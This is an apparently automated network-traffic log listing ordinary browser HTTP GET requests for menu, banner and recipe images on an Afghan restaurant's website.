Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Chapli_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Lamb_Karae.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Cauliflower_Curry.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Spicy_Battered_FishFillet.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Prawn_curry.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Marinated_Chicken_tenderloin.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/res_menu.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/res_menu2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/res_menu3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_dineMenu_image2.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_boqt.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_mainfood.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Rice_with_Dhal.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Chicken_Karae.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Rice_with_Spinach.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Vegetarian_Ashaak.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Potato_Borani.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Borani_Banjan.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_vegfood.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Marinated_Chicken_tenderloin.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_seafood.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_6.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Prawn_curry.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Spicy_Battered_FishFillet.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Cauliflower_Curry.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/res_menu2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/res_menu.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_tea.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_8.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_boqt.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/res_menu3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_mainfood.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_beverage.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_7.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_extra.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_dineMenu_image2.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_vegfood.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_4.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/food_menu_seafood.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/img_recipe_6.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
